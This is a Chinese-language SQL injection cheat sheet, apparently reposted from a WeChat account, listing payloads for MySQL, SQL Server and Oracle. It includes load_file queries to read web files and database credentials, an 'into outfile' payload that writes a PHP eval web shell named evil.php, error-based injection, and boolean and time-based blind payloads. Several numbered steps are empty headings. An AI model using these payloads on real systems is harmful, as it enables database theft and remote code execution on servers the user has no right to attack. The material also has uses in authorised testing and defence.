SQL 注入分类方式：

提交方式：GET  POST COOKIE

0x01 Mysql

---

Mysql划分：权限  root        普通用户 版本  mysql>5.0   mysql<5.0

1.1 root权限

load_file和into outfile用户必须有FILE权限，并且还需要知道网站的绝对路径

判断是否具有读写权限

and (select count(*) from mysql.user)>0#

A、Load_file() 该函数用来读取源文件的函数，只能读取绝对路径的网页文件

注意：路径符号”\”错误  “\”正确  “/”正确，转换成十六进制，不用“”

id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,load_file（’/var/www/index.php’）(物理路径转16进制)

可以用来读取数据库连接文件获取数据连接账号、密码等

?id=1'and 1=2 union select 1,load_file('D:\\wamp\\www\\111.php')%23

B、into outfile函数

条件：1. 绝对路径    2.可以使用单引号

?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'

1.2 MySQL联合查询

1.2.1 适用于mysql低于5.0版本

1.判断是否可以注入

1.2.2 适用于Mysql 5.0以上版本支持查表查列

1.先判断是否可以注入

1.3 MySQL报错注入

mysql暴错注入方法整理，通过floor，UpdateXml，ExtractValue，NAME_CONST，Error based Double Query Injection等方法。

多种报错注入方式：

and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);

1.4 MySQL盲注

基于布尔型注入

id=1 and (select length(user()))=20 # 返回正常页面  长度20位

基于时间型注入

1 xor (if(ascii(mid(user()from(1)for(1)))='r',sleep(5),0))

0x02 SQLServer

---

SA权限：数据库操作，文件管理，命令执行，注册表读取等

Db权限：文件管理，数据库操作等

Public权限：数据库操作

2.1 SQLServer 联合查询

1.判断是否存在注入

2.2 SQLServer 报错注入

1.获取表名

2.3 SQLServer 盲注

1、猜表名

0x03 Oracle

---

3.1 联合查询

Union select null,null,null   从第一个null开始加’null’,得到显示位

3.2 手工显错注入

最大的区别就是utl_inaddr.get_host_address这个函数，10g可以调用，11g需要dba高权限

3.3 盲注

基于布尔类型的盲注：

?id=7782' and length((SELECT name FROM v$database))=4--  获取数据库名长度

基于时间延迟的盲注：

?id=7782' and 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN 1 ELSE 2 END)--

本文分享自微信公众号 - Bypass（Bypass--）。
如有侵权，请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”，欢迎正在阅读的你也加入，一起分享。